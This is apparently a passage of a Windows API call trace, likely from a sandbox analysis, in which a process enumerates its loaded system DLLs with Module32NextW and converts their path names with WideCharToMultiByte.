	[0107.402] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GDI32.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GDI32.dll", lpUsedDefaultChar=0x0) returned 10
	[0107.402] Module32NextW (hSnapshot=0x898, lpme=0x20af280) returned 1
	[0107.403] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\SHELL32.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\SHELL32.dll", lpUsedDefaultChar=0x0) returned 32
	[0107.403] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SHELL32.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SHELL32.dll", lpUsedDefaultChar=0x0) returned 12
	[0107.403] Module32NextW (hSnapshot=0x898, lpme=0x20af280) returned 1
	[0107.404] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\cfgmgr32.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\cfgmgr32.dll", lpUsedDefaultChar=0x0) returned 33
	[0107.404] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="cfgmgr32.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="cfgmgr32.dll", lpUsedDefaultChar=0x0) returned 13
	[0107.404] Module32NextW (hSnapshot=0x898, lpme=0x20af280) returned 1
	[0107.420] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\eappcfg.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\eappcfg.dll", lpUsedDefaultChar=0x0) returned 32
	[0107.420] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="eappcfg.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eappcfg.dll", lpUsedDefaultChar=0x0) returned 12
	[0107.420] Module32NextW (hSnapshot=0x898, lpme=0x20af280) returned 1
	[0107.421] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\odbctrac.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\odbctrac.dll", lpUsedDefaultChar=0x0) returned 33
	[0107.421] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="odbctrac.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="odbctrac.dll", lpUsedDefaultChar=0x0) returned 13
	[0107.421] Module32NextW (hSnapshot=0x898, lpme=0x20af280) returned 1
	[0107.422] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\ATL.DLL", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\ATL.DLL", lpUsedDefaultChar=0x0) returned 28
	[0107.422] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ATL.DLL", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ATL.DLL", lpUsedDefaultChar=0x0) returned 8
	[0107.422] Module32NextW (hSnapshot=0x898, lpme=0x20af280) returned 1
	[0107.423] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\NTDSAPI.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\NTDSAPI.dll", lpUsedDefaultChar=0x0) returned 32
	[0107.423] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NTDSAPI.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NTDSAPI.dll", lpUsedDefaultChar=0x0) returned 12
	[0107.423] Module32NextW (hSnapshot=0x898, lpme=0x20af280) returned 1
	[0107.424] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\WS2_32.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\WS2_32.dll", lpUsedDefaultChar=0x0) returned 31
	[0107.424] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WS2_32.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WS2_32.dll", lpUsedDefaultChar=0x0) returned 11
	[0107.424] Module32NextW (hSnapshot=0x898, lpme=0x20af280) returned 1
	[0107.425] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\ODBC32.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\ODBC32.dll", lpUsedDefaultChar=0x0) returned 31
	[0107.425] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ODBC32.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ODBC32.dll", lpUsedDefaultChar=0x0) returned 11
	[0107.425] Module32NextW (hSnapshot=0x898, lpme=0x20af280) returned 1
	[0107.425] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\DPAPI.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\DPAPI.dll", lpUsedDefaultChar=0x0) returned 30
	[0107.425] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DPAPI.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DPAPI.dll", lpUsedDefaultChar=0x0) returned 10
	[0107.426] Module32NextW (hSnapshot=0x898, lpme=0x20af280) returned 1
	[0107.426] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\windows.storage.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\windows.storage.dll", lpUsedDefaultChar=0x0) returned 40
	[0107.426] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="windows.storage.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="windows.storage.dll", lpUsedDefaultChar=0x0) returned 20
	[0107.426] Module32NextW (hSnapshot=0x898, lpme=0x20af280) returned 1
	[0107.427] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\combase.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\combase.dll", lpUsedDefaultChar=0x0) returned 32
	[0107.427] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="combase.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="combase.dll", lpUsedDefaultChar=0x0) returned 12
	[0107.427] Module32NextW (hSnapshot=0x898, lpme=0x20af280) returned 1
	[0107.428] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\shlwapi.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\shlwapi.dll", lpUsedDefaultChar=0x0) returned 32
	[0107.428] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="shlwapi.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="shlwapi.dll", lpUsedDefaultChar=0x0) returned 12
	[0107.428] Module32NextW (hSnapshot=0x898, lpme=0x20af280) returned 1
	[0107.429] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\kernel.appcore.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\kernel.appcore.dll", lpUsedDefaultChar=0x0) returned 39
	[0107.429] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kernel.appcore.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="kernel.appcore.dll", lpUsedDefaultChar=0x0) returned 19
	[0107.429] Module32NextW (hSnapshot=0x898, lpme=0x20af280) returned 1
	[0107.430] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\shcore.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\shcore.dll", lpUsedDefaultChar=0x0) returned 31
	[0107.430] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="shcore.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="shcore.dll", lpUsedDefaultChar=0x0) returned 11
	[0107.430] Module32NextW (hSnapshot=0x898, lpme=0x20af280) returned 1
	[0107.431] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\powrprof.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\powrprof.dll", lpUsedDefaultChar=0x0) returned 33
	[0107.431] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="powrprof.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="powrprof.dll", lpUsedDefaultChar=0x0) returned 13
	[0107.431] Module32NextW (hSnapshot=0x898, lpme=0x20af280) returned 1
	[0107.431] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\profapi.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\profapi.dll", lpUsedDefaultChar=0x0) returned 32
	[0107.432] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="profapi.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="profapi.dll", lpUsedDefaultChar=0x0) returned 12
	[0107.432] Module32NextW (hSnapshot=0x898, lpme=0x20af280) returned 1
	[0107.433] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\ole32.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\ole32.dll", lpUsedDefaultChar=0x0) returned 30
	[0107.433] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ole32.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ole32.dll", lpUsedDefaultChar=0x0) returned 10
	[0107.433] Module32NextW (hSnapshot=0x898, lpme=0x20af280) returned 1
	[0107.434] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\OLEAUT32.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\OLEAUT32.dll", lpUsedDefaultChar=0x0) returned 33
	[0107.434] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OLEAUT32.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OLEAUT32.dll", lpUsedDefaultChar=0x0) returned 13
	[0107.434] Module32NextW (hSnapshot=0x898, lpme=0x20af280) returned 1
	[0107.435] Module32NextW (hSnapshot=0x898, lpme=0x20af280) returned 1
	[0107.436] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\dsuiext.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\dsuiext.dll", lpUsedDefaultChar=0x0) returned 32
	[0107.436] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="dsuiext.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dsuiext.dll", lpUsedDefaultChar=0x0) returned 12
	[0107.436] Module32NextW (hSnapshot=0x898, lpme=0x20af280) returned 1
	[0107.438] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\netutils.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\netutils.dll", lpUsedDefaultChar=0x0) returned 33
	[0107.438] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="netutils.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="netutils.dll", lpUsedDefaultChar=0x0) returned 13
	[0107.438] Module32NextW (hSnapshot=0x898, lpme=0x20af280) returned 1
	[0107.439] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\logoncli.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\logoncli.dll", lpUsedDefaultChar=0x0) returned 33
	[0107.439] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="logoncli.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="logoncli.dll", lpUsedDefaultChar=0x0) returned 13
	[0107.439] Module32NextW (hSnapshot=0x898, lpme=0x20af280) returned 1
	[0107.440] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\IPHLPAPI.DLL", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\IPHLPAPI.DLL", lpUsedDefaultChar=0x0) returned 33
	[0107.440] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="IPHLPAPI.DLL", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="IPHLPAPI.DLL", lpUsedDefaultChar=0x0) returned 13
	[0107.440] Module32NextW (hSnapshot=0x898, lpme=0x20af280) returned 1
	[0107.441] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\DSROLE.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\DSROLE.dll", lpUsedDefaultChar=0x0) returned 31
	[0107.441] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DSROLE.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DSROLE.dll", lpUsedDefaultChar=0x0) returned 11
	[0107.441] Module32NextW (hSnapshot=0x898, lpme=0x20af280) returned 1
	[0107.442] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\adsldpc.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\adsldpc.dll", lpUsedDefaultChar=0x0) returned 32
	[0107.442] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="adsldpc.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="adsldpc.dll", lpUsedDefaultChar=0x0) returned 12
	[0107.442] Module32NextW (hSnapshot=0x898, lpme=0x20af280) returned 1
	[0107.444] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\WLDAP32.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\WLDAP32.dll", lpUsedDefaultChar=0x0) returned 32
	[0107.444] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WLDAP32.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WLDAP32.dll", lpUsedDefaultChar=0x0) returned 12
	[0107.444] Module32NextW (hSnapshot=0x898, lpme=0x20af280) returned 1
	[0107.445] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\COMCTL32.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\COMCTL32.dll", lpUsedDefaultChar=0x0) returned 121
	[0107.445] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="COMCTL32.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="COMCTL32.dll", lpUsedDefaultChar=0x0) returned 13
	[0107.445] Module32NextW (hSnapshot=0x898, lpme=0x20af280) returned 1
	[0107.446] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\MPR.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\MPR.dll", lpUsedDefaultChar=0x0) returned 28
	[0107.446] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MPR.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MPR.dll", lpUsedDefaultChar=0x0) returned 8
	[0107.446] Module32NextW (hSnapshot=0x898, lpme=0x20af280) returned 1
	[0107.447] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\IMM32.DLL", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\IMM32.DLL", lpUsedDefaultChar=0x0) returned 30
	[0107.447] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="IMM32.DLL", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="IMM32.DLL", lpUsedDefaultChar=0x0) returned 10
	[0107.447] Module32NextW (hSnapshot=0x898, lpme=0x20af280) returned 1
	[0107.449] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_d3c2e4e965da4528\\comctl32.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_d3c2e4e965da4528\\comctl32.dll", lpUsedDefaultChar=0x0) returned 120
	[0107.449] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="comctl32.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="comctl32.dll", lpUsedDefaultChar=0x0) returned 13
	[0107.449] Module32NextW (hSnapshot=0x898, lpme=0x20af280) returned 1
	[0107.450] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\WININET.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\WININET.dll", lpUsedDefaultChar=0x0) returned 32
	[0107.450] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WININET.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WININET.dll", lpUsedDefaultChar=0x0) returned 12
	[0107.450] Module32NextW (hSnapshot=0x898, lpme=0x20af280) returned 1
	[0107.451] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\PSAPI.DLL", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\PSAPI.DLL", lpUsedDefaultChar=0x0) returned 30
	[0107.451] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PSAPI.DLL", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PSAPI.DLL", lpUsedDefaultChar=0x0) returned 10
	[0107.451] Module32NextW (hSnapshot=0x898, lpme=0x20af280) returned 1
	[0107.452] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\USERENV.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\USERENV.dll", lpUsedDefaultChar=0x0) returned 32
	[0107.452] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="USERENV.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="USERENV.dll", lpUsedDefaultChar=0x0) returned 12
	[0107.452] Module32NextW (hSnapshot=0x898, lpme=0x20af280) returned 1
	[0107.517] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\WINHTTP.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\WINHTTP.dll", lpUsedDefaultChar=0x0) returned 32
	[0107.517] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WINHTTP.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WINHTTP.dll", lpUsedDefaultChar=0x0) returned 12
	[0107.517] Module32NextW (hSnapshot=0x898, lpme=0x20af280) returned 1
	[0107.518] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\NETAPI32.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\NETAPI32.dll", lpUsedDefaultChar=0x0) returned 33
	[0107.518] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NETAPI32.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NETAPI32.dll", lpUsedDefaultChar=0x0) returned 13
	[0107.518] Module32NextW (hSnapshot=0x898, lpme=0x20af280) returned 1
	[0107.519] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\SAMCLI.DLL", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\SAMCLI.DLL", lpUsedDefaultChar=0x0) returned 31
	[0107.520] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SAMCLI.DLL", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SAMCLI.DLL", lpUsedDefaultChar=0x0) returned 11
	[0107.520] Module32NextW (hSnapshot=0x898, lpme=0x20af280) returned 1
